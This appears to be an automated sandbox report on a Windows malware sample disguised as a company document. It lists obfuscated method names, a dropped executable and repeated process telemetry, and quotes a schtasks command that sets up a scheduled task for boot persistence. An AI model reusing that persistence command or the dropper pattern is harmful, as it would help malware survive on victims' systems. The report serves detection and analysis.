Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, bFojdgmUnuGXsZ2Et8.cs	High entropy of concatenated method names: 'elfPcputW4', 'lWxPlon1Yc', 'rLJ1hg5Ofh', 'vKh1oiFNKi', 'vCs13gEpRU', 'Q351Svy54f', 'eIb1nFGGK9', 'fHE1yqtuUT', 'WGm1vKnH4G', 'SfZ16RdAEF'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, fn3dhyeRmpy1aqIbhC.cs	High entropy of concatenated method names: 'dsq9MA7poc', 'CLi9tkAdux', 'wgW9f0Wiyp', 'gdk9HLGZsH', 'TCX9JXl0Vv', 'oqg9PfoWBV', 'Vxe9QbXUF9', 'Yl7kqj7IAw', 'DtIkXZW8El', 'gwLkGQnX5y'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs	High entropy of concatenated method names: 'V76t7gMw0d', 'FXPtHUxbmi', 'NFGtJqfcnZ', 'dFEt1WcFxY', 'mwgtPNMsSv', 'YINtQ3Do7A', 'KRRtpdXbNl', 'J6ltsWWPId', 'w4EtueCj9s', 'Pv9tUInC4d'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, UHgAuR0KWEiSURYQpg.cs	High entropy of concatenated method names: 'ToString', 'Xn8Cwkyen4', 'lVUCbRu7jv', 'tyjChoeN09', 'UpHCohJaxp', 'cSXC3oQd9L', 'sYACSFHVi3', 'D5cCnlbkXm', 'DpNCy4Uj0X', 'l7BCvxo5XQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, HecPmJ6gFWvqumjiqv.cs	High entropy of concatenated method names: 'D3uJEMNjoA', 'CcRJBr8j7f', 'w7ZJDqbEil', 'Kb4J5VccR0', 'd86JN4NVnq', 'yFXJR32HNl', 'qPoJq2OdFq', 'F6xJXSvrlm', 'dKqJG47Bjd', 'I7oJgXgVvn'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, SMh6MIRIc6OakG07pp.cs	High entropy of concatenated method names: 'OmjkHs9vCX', 'F7ukJ1FjNW', 'RbRk1X7CL4', 'RoLkPpEJ0Y', 'lpckQADnKf', 'O9gkp4NJN5', 'JYaks2i9YL', 'dlHkuCtgfP', 'VoTkUmyXm7', 'T2BkeuVICG'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, uoVP2uCg0bdWUyFWjv.cs	High entropy of concatenated method names: 'uYW1dLwxiV', 'vyY1WWhoOC', 'chU10QmOqd', 'Ess1Z8lZoS', 'iRR1L6qK1P', 'Cb61C0WviQ', 'uCR12ILHVs', 'HJR1kgUixu', 'yx419Q7yq0', 'oP21r4iRaE'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, sTZIxnbilXR1LmWj3Sl.cs	High entropy of concatenated method names: 'm8u9aSqCN2', 'UR49OxHU1x', 'Nlk9V1JFZI', 'tH09dbXSAh', 'D9c9c0YPi8', 'ai09WVJrWG', 'EkR9lpPKlE', 'oJC90f34Qh', 'RKg9Zwib4d', 'm8g9xOnYZA'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, jy01KOzR750y1LXxEC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rwq9TOOtRZ', 'I5u9LImMm8', 'XEt9CPTKuL', 'wBG92qSwSi', 'iLE9k4ZdH3', 'jw099TlRgJ', 'Mpb9rFKkq0'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, t1DfyrSZWB1uISyNpZ.cs	High entropy of concatenated method names: 'K9KQ7TFMnh', 'E0IQJbmwkI', 'HiEQP81RaQ', 'aMnQpxiwnm', 'r5QQs1NnXd', 'j0lPNo1WDU', 'Mb2PRvhoO2', 'Np1PqkDSZE', 'deNPXOiUQH', 'XidPGLYKSW'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, QNWvhQjrZINN7KPu3U.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'p3JYG8gFty', 'GSuYgZiR1n', 'GxUYzZna0i', 'jaYtKp9Nkw', 'n3rtM42g7l', 'OJVtY8XMNN', 'xsPtttALNb', 'E1s42BjIUtnsAMJYRHL'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, kiqa3DwVxysX4lOlBK.cs	High entropy of concatenated method names: 'xl8VBKgsT', 'lG4dl9vV1', 'D8RWfMay5', 'VAelEEp3T', 'DtbZaqC94', 'CfZxk3HTM', 'Kq4VpAV4K2b2FpedVo', 'aLqKjK9J0dhueLmyJc', 'fPPkBqLY8', 'vU3rl5W7x'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, G1b9Yx2TcPUdaY9281.cs	High entropy of concatenated method names: 'uWiMpHEYse', 'IbEMsFwYUM', 'wQRMUILgWl', 'bWUMecCkd4', 'RpCMLFxjHm', 'mx8MCpwa6Y', 'MnhbSl6gyXKBTqRjxf', 'Ph7hI45WRD5FMMD70y', 'rWhMM88Iyt', 'vOvMtmCp0V'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, GgAgrKJsDwJ5JIVu6G.cs	High entropy of concatenated method names: 'CYdT0xQiSd', 'KQtTZ3BKEN', 'YmFT42MUS2', 'gypTbLQjw9', 'Mf7ToswUDs', 'XVTT3c4Xeb', 'HdiTn8u5IL', 'o7RTydAhKI', 'dR9T6R6wEh', 'op1Twjnngd'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, rrIrYEfBhY39sDlwNH.cs	High entropy of concatenated method names: 'dWi2XKVHcf', 'fA52gvkjr1', 'pvekKY05mS', 'tZSkMcqCTm', 'bcJ2whR0UC', 'J2L2jJE5Wk', 'tau2AEFhsf', 'W2y2E4pyN1', 'oQD2B20cvM', 'cEm2DN2fmQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, OpG0a7BjWJqeIRfEJr.cs	High entropy of concatenated method names: 'MQUpaEePsA', 'SDhpOONDfA', 'tvhpV8nsqh', 'KP2pdxnAU3', 'XUwpcrH6Uu', 'bhJpWDdZLR', 'PDOplhYHlf', 'ow7p0hlVe7', 'mtmpZGmCau', 'DXipxn90sw'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, a6Rf7FhOnIQQp4Keik.cs	High entropy of concatenated method names: 'Dispose', 'I1PMG2xkVV', 'IuVYbNwK7t', 'Lht8835Io1', 'WR4MgnZ2H5', 'TDTMzLOs2m', 'ProcessDialogKey', 'n6NYKJvkQ5', 'dEhYMgAtVW', 'PoSYYEGiQh'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, xhRr5d38UPcJ29ohL9.cs	High entropy of concatenated method names: 'MwxpH2ii7p', 'u33p1mU9NQ', 'XicpQ4ZAWi', 'y1NQgX81EX', 'iRmQzNJ1hS', 'XOVpKR5dpH', 'xKopMw7ld2', 'WdcpYhniml', 'IquptxSwR0', 'erRpf2uyr9'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, n99CWu8o4qWU03vC7R.cs	High entropy of concatenated method names: 'DLD2UTZ9CT', 'fck2e0G5Lx', 'ToString', 'X132HV5up9', 'cLa2JUBgox', 'l7n21BZcD1', 'JFh2PRon5I', 'P2Y2Q4FQEh', 'O0L2pAe2jI', 'Uc72s8f5WQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, OH7rokb1NRcoyR55vja.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gaVrE0mBJk', 'x3irBpZvIU', 'RUDrDd0gLR', 'bVZr5LUDEp', 'lkqrN0rBv6', 'iPJrR9B78l', 'PuLrqaZFDk'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, bFojdgmUnuGXsZ2Et8.cs	High entropy of concatenated method names: 'elfPcputW4', 'lWxPlon1Yc', 'rLJ1hg5Ofh', 'vKh1oiFNKi', 'vCs13gEpRU', 'Q351Svy54f', 'eIb1nFGGK9', 'fHE1yqtuUT', 'WGm1vKnH4G', 'SfZ16RdAEF'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, fn3dhyeRmpy1aqIbhC.cs	High entropy of concatenated method names: 'dsq9MA7poc', 'CLi9tkAdux', 'wgW9f0Wiyp', 'gdk9HLGZsH', 'TCX9JXl0Vv', 'oqg9PfoWBV', 'Vxe9QbXUF9', 'Yl7kqj7IAw', 'DtIkXZW8El', 'gwLkGQnX5y'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs	High entropy of concatenated method names: 'V76t7gMw0d', 'FXPtHUxbmi', 'NFGtJqfcnZ', 'dFEt1WcFxY', 'mwgtPNMsSv', 'YINtQ3Do7A', 'KRRtpdXbNl', 'J6ltsWWPId', 'w4EtueCj9s', 'Pv9tUInC4d'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, UHgAuR0KWEiSURYQpg.cs	High entropy of concatenated method names: 'ToString', 'Xn8Cwkyen4', 'lVUCbRu7jv', 'tyjChoeN09', 'UpHCohJaxp', 'cSXC3oQd9L', 'sYACSFHVi3', 'D5cCnlbkXm', 'DpNCy4Uj0X', 'l7BCvxo5XQ'

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

File created: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
